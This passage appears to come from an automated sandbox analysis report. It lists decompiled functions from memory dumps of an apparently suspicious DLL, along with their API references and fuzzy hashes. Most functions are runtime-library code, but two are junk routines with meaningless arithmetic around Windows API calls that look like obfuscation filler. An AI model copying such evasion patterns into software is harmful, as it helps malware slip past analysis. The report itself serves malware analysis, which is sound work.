    					_t11 =  *_t10 & 0x0000ffff;
    					do {
    						_t12 = 2;
    						_t9 = _t11;
    						0;
    						while(_t9 != 0 && _t13 == _t9) {
    							_t13 =  *(_t7 + _t12) & 0x0000ffff;
    							_t9 =  *(_t10 + _t12) & 0x0000ffff;
    							_t12 = _t12 + 2;
    							if(_t13 != 0) {
    								continue;
    							}
    							break;
    						}
    						if(_t9 != 0) {
    							goto L8;
    						}
    						goto L10;
    						L8:
    						_t13 = _t7[1] & 0x0000ffff;
    						_t7 =  &(_t7[1]);
    					} while (_t13 != 0);
    					goto L9;
    				}
    				L10:
    				return _t7;
    			}

    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: fa7d716b089524dc2f7d385a4bf6a4bc5e87ab36410886b3fa01f568e3c87611
    • Instruction ID: 660a7b9bf7a5ff197158208f08959c46b1065c4d68ffe7da8a6100450c499c27
    • Opcode Fuzzy Hash: fa7d716b089524dc2f7d385a4bf6a4bc5e87ab36410886b3fa01f568e3c87611
    • Instruction Fuzzy Hash: 65F0BE6B60922347D3608FB68450FB263F0EF81B95B25105BE8A06B290E7708C01D2BC
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6E4CE970(signed short* _a4, intOrPtr _a8) {
    				signed char _t8;
    				signed short* _t10;
    				intOrPtr _t11;
    				signed short* _t12;
    				void* _t13;
    				void* _t14;
    
    				_t11 = _a8;
    				_t12 = _a4;
    				if(_t11 != 0) {
    					_t12 =  &(_t12[1]);
    					_t10 = 0;
    					while( *((short*)(_t12 - 2)) != 0) {
    						L3:
    						_t12 =  &(_t12[1]);
    					}
    					_t8 = E6E4B7B00( *_t12 & 0x0000ffff, 0);
    					_t14 = _t13 + 8;
    					_t18 = _t8 & 0x00000001;
    					if((_t8 & 0x00000001) != 0) {
    						_t12 = 0;
    						__eflags = 0;
    					} else {
    						_t10 = _t10 + 1;
    						E6E4B6CC0(_t18, _t10, 1);
    						_t13 = _t14 + 8;
    						if(_t10 != _t11) {
    							goto L3;
    						} else {
    						}
    					}
    				}
    				return _t12;
    			}

    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: c7c39cc5f226215e91a3963c6a61972da5530e885cd5b9f521970bcca6ace37e
    • Instruction ID: 6726371c2209d2551e46fc2c3af9226c593d8fb48a98711b83a85f71664f50a9
    • Opcode Fuzzy Hash: c7c39cc5f226215e91a3963c6a61972da5530e885cd5b9f521970bcca6ace37e
    • Instruction Fuzzy Hash: 6FF0B4AAE5422455D6A019F55C87E76A37CCB41A19F14982BED5863280E3B2948481E3
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6E4C1F90(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
    				intOrPtr _t5;
    				intOrPtr _t6;
    				intOrPtr _t7;
    				void* _t8;
    				intOrPtr* _t9;
    
    				_t5 = _a8;
    				if(_t5 != 0) {
    					_t6 = _a16;
    					_t7 = _a12;
    					_t9 = _a4;
    					_t8 = 0;
    					if( *_t9 == _t7) {
    						L5:
    						 *_t9 = _t6;
    					} else {
    						while(1) {
    							L3:
    							_t8 = _t8 + 1;
    							_t9 = _t9 + 1;
    							_t5 = _t5 - 1;
    							if(_t5 == 0) {
    								goto L6;
    							}
    							if( *_t9 != _t7) {
    								continue;
    							} else {
    								goto L5;
    							}
    							L7:
    						}
    						goto L6;
    					}
    					goto L3;
    				}
    				L6:
    				return _t5;
    				goto L7;
    			}

    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: edac2b45d96311c1aaa1b7a25e903e165dd5687b188b020ffe204de3e7435124
    • Instruction ID: eca183a9d733bb7113366cddad474b474e6a8097cd1314c0fe725853d0cccbf5
    • Opcode Fuzzy Hash: edac2b45d96311c1aaa1b7a25e903e165dd5687b188b020ffe204de3e7435124
    • Instruction Fuzzy Hash: 5BE04F5950D2D306D7518E746410C66EFF4998B954B14198EE4D057305C611C48D83B7
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 1dcb9d17c6bd49a5b8003de7c39815761d11ec8947e699be49e770c3bbb97ee4
    • Instruction ID: f65fefa0477c0fd62d90b491dcabf8d51f6851735b893ec72943eb1017fccd14
    • Opcode Fuzzy Hash: 1dcb9d17c6bd49a5b8003de7c39815761d11ec8947e699be49e770c3bbb97ee4
    • Instruction Fuzzy Hash: D0D0A77210861817C2013BE8A400EC67ECC8FD6366B25005BFA4CA7B418B71458183E5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6E4C3E90() {
    
    				return  *[fs:0x30];
    			}

    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
    • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
    • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
    • Instruction Fuzzy Hash:
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: _strncmp
    • String ID:
    • API String ID: 909875538-0
    • Opcode ID: 2256bfb21d839826948cc80ee376417e6d47cb8e699ffab64426ef2bc53d30dc
    • Instruction ID: 43647b523227b957b6f71ea4298f1eafedd7fdbe81cd4de9424022bad3ee6ff5
    • Opcode Fuzzy Hash: 2256bfb21d839826948cc80ee376417e6d47cb8e699ffab64426ef2bc53d30dc
    • Instruction Fuzzy Hash: A44106B3B85D1122C1906BBAAC02F87A755BBA035BF058537FA05DAB45E721942DC3E0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,6E506830,0000000C,6E4EB406,00000000,00000000,?,6E4E8B9D,?,6E5085E0,?,?), ref: 6E4EB2DD
    • __crt_waiting_on_module_handle.LIBCMT ref: 6E4EB2E8
      • Part of subcall function 6E4ED6F0: Sleep.KERNEL32(000003E8,6E51A490,?,6E4EB22E,KERNEL32.DLL,?,6E4ED3C9,?,6E4E850D,6E4E8B9D,?,?,6E4E8B9D,?,6E5085E0), ref: 6E4ED6FC
      • Part of subcall function 6E4ED6F0: GetModuleHandleW.KERNEL32(6E4E8B9D,?,6E4EB22E,KERNEL32.DLL,?,6E4ED3C9,?,6E4E850D,6E4E8B9D,?,?,6E4E8B9D,?,6E5085E0,?,?), ref: 6E4ED705
    • __lock.LIBCMT ref: 6E4EB343
    • InterlockedIncrement.KERNEL32(F08B0000), ref: 6E4EB350
    • __lock.LIBCMT ref: 6E4EB364
    • ___addlocaleref.LIBCMT ref: 6E4EB382
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: HandleModule__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
    • String ID: (FPn$KERNEL32.DLL
    • API String ID: 4021795732-620075342
    • Opcode ID: 952b722fa0edd3ced936c9fb68a5a592fe122c5b9d62da7ab4cf6a6860bc9e19
    • Instruction ID: 1388ef50c4230d8ed6cb2a15fbefbe8b6346626c28ad77ef61ddf812a1e689ac
    • Opcode Fuzzy Hash: 952b722fa0edd3ced936c9fb68a5a592fe122c5b9d62da7ab4cf6a6860bc9e19
    • Instruction Fuzzy Hash: 8C11AF71800B01EED7609FB5D801F8ABBF4AF41329F20891EE49997B90CB74A941CF95
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • __decode_pointer.LIBCMT ref: 6E4E8C02
      • Part of subcall function 6E4EB1DF: GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,6E4ED3C9,?,6E4E850D,6E4E8B9D,?,?,6E4E8B9D,?,6E5085E0,?,?), ref: 6E4EB21E
      • Part of subcall function 6E4EB1DF: __crt_waiting_on_module_handle.LIBCMT ref: 6E4EB229
      • Part of subcall function 6E4EB1DF: GetProcAddress.KERNEL32(00000000,6E5044D0), ref: 6E4EB239
    • __msize.LIBCMT ref: 6E4E8C20
    • __realloc_crt.LIBCMT ref: 6E4E8C44
    • __realloc_crt.LIBCMT ref: 6E4E8C5A
    • __encode_pointer.LIBCMT ref: 6E4E8C6C
    • __encode_pointer.LIBCMT ref: 6E4E8C7A
    • __encode_pointer.LIBCMT ref: 6E4E8C85
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: __encode_pointer$__realloc_crt$AddressHandleModuleProc__crt_waiting_on_module_handle__decode_pointer__msize
    • String ID:
    • API String ID: 1302542147-0
    • Opcode ID: 532ffcd40000ac6c988ef5240bc0728bd686350c4ffe9c0348f0b6f5ca3f6c73
    • Instruction ID: e8c55e51c9c32973e91d66ae8c4d57b080c0a3c23073b775bcbfc09d4b86cc5f
    • Opcode Fuzzy Hash: 532ffcd40000ac6c988ef5240bc0728bd686350c4ffe9c0348f0b6f5ca3f6c73
    • Instruction Fuzzy Hash: 34113A72200301DEAB205FB4DC82CD977A9DA4A2E6328483FE404E6D58EF20DD408780
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • __CreateFrameInfo.LIBCMT ref: 6E4EDD8B
      • Part of subcall function 6E4E8A00: __getptd.LIBCMT ref: 6E4E8A0E
      • Part of subcall function 6E4E8A00: __getptd.LIBCMT ref: 6E4E8A1C
    • __getptd.LIBCMT ref: 6E4EDD95
      • Part of subcall function 6E4EB42B: __getptd_noexit.LIBCMT ref: 6E4EB42E
      • Part of subcall function 6E4EB42B: __amsg_exit.LIBCMT ref: 6E4EB43B
    • __getptd.LIBCMT ref: 6E4EDDA3
    • __getptd.LIBCMT ref: 6E4EDDB1
    • __getptd.LIBCMT ref: 6E4EDDBC
    • _CallCatchBlock2.LIBCMT ref: 6E4EDDE2
      • Part of subcall function 6E4E8AA5: __CallSettingFrame@12.LIBCMT ref: 6E4E8AF1
      • Part of subcall function 6E4EDE89: __getptd.LIBCMT ref: 6E4EDE98
      • Part of subcall function 6E4EDE89: __getptd.LIBCMT ref: 6E4EDEA6
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
    • String ID:
    • API String ID: 1602911419-0
    • Opcode ID: eb468c4697405e42c6457a59a6a4db705e21c0e7bf8ef36406ca14a8090f7836
    • Instruction ID: 4b1841635963b5faf43a983e692b94f918259b0dca3f3220d56d9eae3936b6ce
    • Opcode Fuzzy Hash: eb468c4697405e42c6457a59a6a4db705e21c0e7bf8ef36406ca14a8090f7836
    • Instruction Fuzzy Hash: 5511B471C00309DFDB00DFF5D844AED7BB8BF08315F1488AAE954A7650DB799A159F90
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: DuplicateErrorHandleLast__alloc_osfhnd__dosmaperr__set_osfhnd
    • String ID:
    • API String ID: 3341121645-0
    • Opcode ID: 7bf5575a031e9ff2d84cbb00679e13d94cf5c2fb17954047c8f8c309e9254ce7
    • Instruction ID: 731883b19e4e21c44173e3af47aefd06c6ee362b0f1556ad58d8877ff91c3224
    • Opcode Fuzzy Hash: 7bf5575a031e9ff2d84cbb00679e13d94cf5c2fb17954047c8f8c309e9254ce7
    • Instruction Fuzzy Hash: 0C3114314086558FCF01DFF8C894EDDBBB5AF8A326B18068AE450AB7D2D771E905CB90
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • __getptd.LIBCMT ref: 6E4EC6C7
      • Part of subcall function 6E4EB42B: __getptd_noexit.LIBCMT ref: 6E4EB42E
      • Part of subcall function 6E4EB42B: __amsg_exit.LIBCMT ref: 6E4EB43B
    • __amsg_exit.LIBCMT ref: 6E4EC6E7
    • __lock.LIBCMT ref: 6E4EC6F7
    • InterlockedDecrement.KERNEL32(?), ref: 6E4EC714
    • InterlockedIncrement.KERNEL32(6E508E28), ref: 6E4EC73F
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
    • String ID:
    • API String ID: 4271482742-0
    • Opcode ID: 23fa74e23e607e9b6838d01ad0ed950d1170a57fe9b4121144ad0142aee9f9d4
    • Instruction ID: c7505791507c36fa0fc94ac67dc781a8370ca6ce39ef384e2292fd532ac6d12b
    • Opcode Fuzzy Hash: 23fa74e23e607e9b6838d01ad0ed950d1170a57fe9b4121144ad0142aee9f9d4
    • Instruction Fuzzy Hash: 3B015B72900B629BDA51AFF59444FCE7BA4AF49726F11400BE810ABB80CB746941CFD6
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • __lock.LIBCMT ref: 6E4E760D
      • Part of subcall function 6E4EB99E: __mtinitlocknum.LIBCMT ref: 6E4EB9B4
      • Part of subcall function 6E4EB99E: __amsg_exit.LIBCMT ref: 6E4EB9C0
      • Part of subcall function 6E4EB99E: RtlEnterCriticalSection.NTDLL(?), ref: 6E4EB9C8
    • ___sbh_find_block.LIBCMT ref: 6E4E7618
    • ___sbh_free_block.LIBCMT ref: 6E4E7627
    • HeapFree.KERNEL32(00000000,6E4E8B9D,6E506698,0000000C,6E4EB97F,00000000,6E506880,0000000C,6E4EB9B9,6E4E8B9D,?,?,6E4F1E8C,00000004,6E506B60,0000000C), ref: 6E4E7657
    • GetLastError.KERNEL32(?,6E4F1E8C,00000004,6E506B60,0000000C,6E4EEA6A,6E4E8B9D,?,00000000,00000000,00000000,?,6E4EB3DD,00000001,00000214), ref: 6E4E7668
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
    • String ID:
    • API String ID: 2714421763-0
    • Opcode ID: 38fb1f534d8e6e59d95234026ca286e00c99a3a28acb2aff8fb5aaa83e65a956
    • Instruction ID: eca0d9b158473ed273b4994e305d9c5115f7598fc3fcd1533714ef72749653a0
    • Opcode Fuzzy Hash: 38fb1f534d8e6e59d95234026ca286e00c99a3a28acb2aff8fb5aaa83e65a956
    • Instruction Fuzzy Hash: E4018F31849705AADF606BF49808FCD3A68AF4177AF14491FE500AA9C5DB3994408AD4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6E4B2A90(char _a4) {
    				signed int _v13;
    				signed int _v20;
    				signed char _v21;
    				signed int _v28;
    				signed int _v32;
    				signed int _v36;
    				WNDCLASSA* _v40;
    				signed int _v44;
    				signed int _v48;
    				RECT* _t41;
    				signed int _t44;
    				int _t45;
    				signed int _t47;
    				signed int _t48;
    				signed int _t49;
    				WNDCLASSA* _t56;
    				signed char _t57;
    				signed int _t59;
    				signed char _t60;
    				signed int _t62;
    				signed int _t63;
    				signed int _t66;
    				signed int _t67;
    				struct HWND__* _t70;
    				char* _t74;
    				signed int _t76;
    				WNDCLASSA* _t78;
    				signed int _t79;
    				signed char _t82;
    				signed int _t83;
    				signed int _t84;
    				void* _t85;
    
    				_t1 =  &_a4; // 0x6e4b6ae1
    				_t85 =  *_t1;
    				_t41 = _t85 & 0x00000002;
    				_v28 = _t41;
    				_t70 = _t41 ^ _t85;
    				_v20 = _t70;
    				_v13 = _t70 * 0xffffffae;
    				InvalidateRect(_t70, _t41, _t70);
    				_t44 = _v13 + _v20;
    				_v20 = _t44;
    				_v13 =  ~(_t44 << 2);
    				if(_t85 != _t44 && _t85 != _v20 && _t85 != _v28) {
    					_t66 = (_v13 & _t85) - _t85;
    					_v13 = _t66;
    					_t67 = _t66;
    					_v20 = _t67;
    					_v32 = _t67 - _t85;
    				}
    				_t45 = _v20;
    				_t74 = _t45 + 0x23;
    				_v32 = _t74;
    				RegEnumValueW(_t85, _t45, _t85, _t85, _t45, _v28, _t74, _t45);
    				_t47 = _v32;
    				_t76 = _t85 + _t47 | _t85;
    				_v36 = _t76;
    				_t82 = _v13 & _t76;
    				_v13 = _t82;
    				_t78 = _t82 * _v28;
    				_v40 = _t78;
    				_t48 = _t47 * _t78;
    				_v44 = _t48;
    				_t49 = _t48 & _v20;
    				_v21 = _t49;
    				_v20 = _t78 + _t49;
    				RegisterClassA(_t78);
    				_t79 = _v20;
    				_t56 = _t79 * _t85 + _v36;
    				_v40 = _t56;
    				_t83 = _v28;
    				_t57 = _t56 + _t83;
    				_v13 = _t57;
    				_t84 = _t57;
    				_v48 = _t84;
    				_t59 = _t84 - _t83;
    				_v36 = _t59;
    				_t60 = _t85 + _t59;
    				_v21 = _t60;
    				_t62 = _t60 * _t84;
    				_v28 = _t62;
    				_t63 = _t62 * _t79;
    				_v20 = _t63;
    				return _t63;
    			}




































    APIs
    • InvalidateRect.USER32(jKn,jKn,jKn,?,?,?,?,?,?,?,6E4B6AE1,?), ref: 6E4B2AB3
    • RegEnumValueW.ADVAPI32(jKn,?,jKn,jKn,?,?,?,?,?,?,?,?,?,?,?,6E4B6AE1), ref: 6E4B2B04
    • RegisterClassA.USER32 ref: 6E4B2B3D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp
    Similarity
    • API ID: ClassEnumInvalidateRectRegisterValue
    • String ID: jKn
    • API String ID: 4098621799-3617101073
    • Opcode ID: c5507035e9d763e969d46bc7f1bcdcf9e715d84eae0b5368cce25156a001ea5a
    • Instruction ID: b1eb06d9b21015742ab9c7e60cbf52faed7455fd075e86f1db9118ce22fba44b
    • Opcode Fuzzy Hash: c5507035e9d763e969d46bc7f1bcdcf9e715d84eae0b5368cce25156a001ea5a
    • Instruction Fuzzy Hash: 07312A71E0466A9FCF08DFA8C8965FEFFF9AE49200B04415BE454E3341E6789645CBE4
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • _malloc.LIBCMT ref: 6E4E8B98
      • Part of subcall function 6E4E8454: __FF_MSGBANNER.LIBCMT ref: 6E4E8477
      • Part of subcall function 6E4E8454: __NMSG_WRITE.LIBCMT ref: 6E4E847E
    • std::bad_alloc::bad_alloc.LIBCMT ref: 6E4E8BBB
      • Part of subcall function 6E4E8B14: std::exception::exception.LIBCMT ref: 6E4E8B20
    • std::bad_exception::bad_exception.LIBCMT ref: 6E4E8BCF
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: _mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
    • String ID: P]
    • API String ID: 2897411638-3263726251
    • Opcode ID: c088ca590b57fbc07cc734ae27c377400ae2975bc85b2343e64d945541c5d9ec
    • Instruction ID: 171b8bda3af5aa38d2b0fdcfe033c0150d15de131599e54e28bee931690badb3
    • Opcode Fuzzy Hash: c088ca590b57fbc07cc734ae27c377400ae2975bc85b2343e64d945541c5d9ec
    • Instruction Fuzzy Hash: 1AF027B48042096EDF4597F0D805DCD3BAC4F4525DB19085FF81069D82DF30890A82D1
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: _realloc
    • String ID:
    • API String ID: 1750794848-0
    • Opcode ID: 763a65b3e9a6a89bc06fadb278f6555b4bf3f50c16883fdd1ae6636f7e1700c5
    • Instruction ID: 63f68cb523ab7dc8ec6b37014593908cb218b918e66564b14f0215e2312f6f93
    • Opcode Fuzzy Hash: 763a65b3e9a6a89bc06fadb278f6555b4bf3f50c16883fdd1ae6636f7e1700c5
    • Instruction Fuzzy Hash: 5DB19CB0A087059FC354CFB9C880A5ABBF1FF49305F444A6EE48987B51E734E949CB96
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: _realloc
    • String ID:
    • API String ID: 1750794848-0
    • Opcode ID: 7e6b05da01ded5eeb0f18a479d5990df2a24bcd5fcce013a8a6a7b911c0e889e
    • Instruction ID: 71280094ff8a7a105397bb7f616c173dfa3929b1c70830a82a5cecbea6d6dbc2
    • Opcode Fuzzy Hash: 7e6b05da01ded5eeb0f18a479d5990df2a24bcd5fcce013a8a6a7b911c0e889e
    • Instruction Fuzzy Hash: CB71E3B1A04B018FC360CF6AC480A56F7F5FF99351B518A2ED48A87A51E770F946CF90
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6E4F208D
    • __isleadbyte_l.LIBCMT ref: 6E4F20C1
    • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?), ref: 6E4F20F2
    • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?), ref: 6E4F2160
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
    • String ID:
    • API String ID: 3058430110-0
    • Opcode ID: baabef10164ac9928e961ab8cbb44e912bfcd3c10b2c67ed747c366188067a77
    • Instruction ID: f37d938f04645bfe1d890c79fdababca38318c17018ccf455f05199025d0bdd2
    • Opcode Fuzzy Hash: baabef10164ac9928e961ab8cbb44e912bfcd3c10b2c67ed747c366188067a77
    • Instruction Fuzzy Hash: B531C232A04297EFDB00DFF4C854EAE7BB5FF81711B04856AE6608B291DB31D942CB59
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
    • String ID:
    • API String ID: 3016257755-0
    • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
    • Instruction ID: 02569248587a1bf947a41fee97560cd8437c7002c17b3bc07bfce7d92455c55b
    • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
    • Instruction Fuzzy Hash: BF116D3204014ABBCF124EE4CC52CEE3F76BF59256B058856FA6858920C336C5B2BB81
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • __getptd.LIBCMT ref: 6E4ECE33
      • Part of subcall function 6E4EB42B: __getptd_noexit.LIBCMT ref: 6E4EB42E
      • Part of subcall function 6E4EB42B: __amsg_exit.LIBCMT ref: 6E4EB43B
    • __getptd.LIBCMT ref: 6E4ECE4A
    • __amsg_exit.LIBCMT ref: 6E4ECE58
    • __lock.LIBCMT ref: 6E4ECE68
    Memory Dump Source
    • Source File: 00000000.00000002.302085687.000000006E4D9000.00000020.00020000.sdmp, Offset: 6E4D9000, based on PE: false
    Similarity
    • API ID: __amsg_exit__getptd$__getptd_noexit__lock
    • String ID:
    • API String ID: 3521780317-0
    • Opcode ID: c7c6bf583dcfd1989ceebda2e948495f5e1dff52b7405bdc3635620e2b371794
    • Instruction ID: 3a8d15ab46cc2b5573b7c27e641d534e57d5a4cfae2a53ab85ef09bc81d4cd81
    • Opcode Fuzzy Hash: c7c6bf583dcfd1989ceebda2e948495f5e1dff52b7405bdc3635620e2b371794
    • Instruction Fuzzy Hash: 7BF09032A10B00CAD760EFF98401FCD7BE86F40726F02495FD540ABAC0CB74A901DAD1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6E4B4B20(BITMAPINFO* _a4, char _a8) {
    				signed int _v13;
    				struct HDC__* _v20;
    				signed int _v24;
    				signed int _v28;
    				signed int _v32;
    				signed int _v36;
    				signed int _t44;
    				signed int _t45;
    				signed int _t47;
    				signed int _t54;
    				signed int _t59;
    				signed int _t61;
    				signed int _t66;
    				void* _t67;
    				signed int _t70;
    				signed int _t71;
    				signed int _t75;
    				BITMAPINFO* _t76;
    
    				_t1 =  &_a8; // 0x6e4b665f
    				_t75 =  *_t1;
    				_t76 = _a4;
    				_t44 = _t75 | 0x00000020;
    				_t66 = _t44 + _t75;
    				_v24 = _t66;
    				_t45 = _t44 * _t66;
    				_v20 = _t45;
    				_t47 = _t45 + 0x000002d6 & 0x00000010;
    				_v13 = _t47;
    				_v32 = _t47 - _t75;
    				if(_t75 == 0x7d0e2e2c && _t76 == _v24) {
    					_t61 = _v32 & _v24;
    					_v24 = _t61;
    					_v13 = _v13 & 0x000000ff ^ _t61;
    					CopyMetaFileA(_v20, _v20);
    					_v28 = _v13 & _t76;
    				}
    				if(_t75 == _v13 && _t76 != _v20 && _t75 == _t76) {
    					_t59 = _v28;
    					_t70 = _t59 + _t75 + _t76 ^ _t76;
    					_v24 = _t70;
    					_t71 = _v20 + _t70;
    					_v32 = _t71;
    					_v36 = _t71 - _t59;
    				}
    				_v28 = _v36 * _v28;
    				CreateDIBitmap(_v20, _v24, _v20, _v32, _t76, _t76);
    				_t54 = _v28;
    				_t67 = _t54 + _t75;
    				_v28 = _t54 + _t75 + 0x34f;
    				_v24 = _t76 + _t67 + 0x34f;
    				_v20 = _t76 + _t67 + 0x469;
    				return _v20;
    			}






















    APIs
    • CopyMetaFileA.GDI32(?,?,?,6E4BF1F5,?,6E4B665F,?,?,?,?,?,?,?,?,?,6E4BF1F5), ref: 6E4B4B73
    • CreateDIBitmap.GDI32(?,6E4BF1F5,?,?,?,?), ref: 6E4B4BC2
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp
    Similarity
    • API ID: BitmapCopyCreateFileMeta
    • String ID: _fKn
    • API String ID: 1644440266-1207414251
    • Opcode ID: 0557c86ad0fa4477ea6957612acb4df1edaeb93d6d8e1fc5d3db081b40eda8f4
    • Instruction ID: 2a7261bf38c6571fcb6af175201619025cc0f8071d735eca036176e142e0714b
    • Opcode Fuzzy Hash: 0557c86ad0fa4477ea6957612acb4df1edaeb93d6d8e1fc5d3db081b40eda8f4
    • Instruction Fuzzy Hash: 9C31E972E0411A9FCF15DFA8C885AEEFBF8FF49250F05046AD655E7201E634A601CBE1
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Strings
    Memory Dump Source
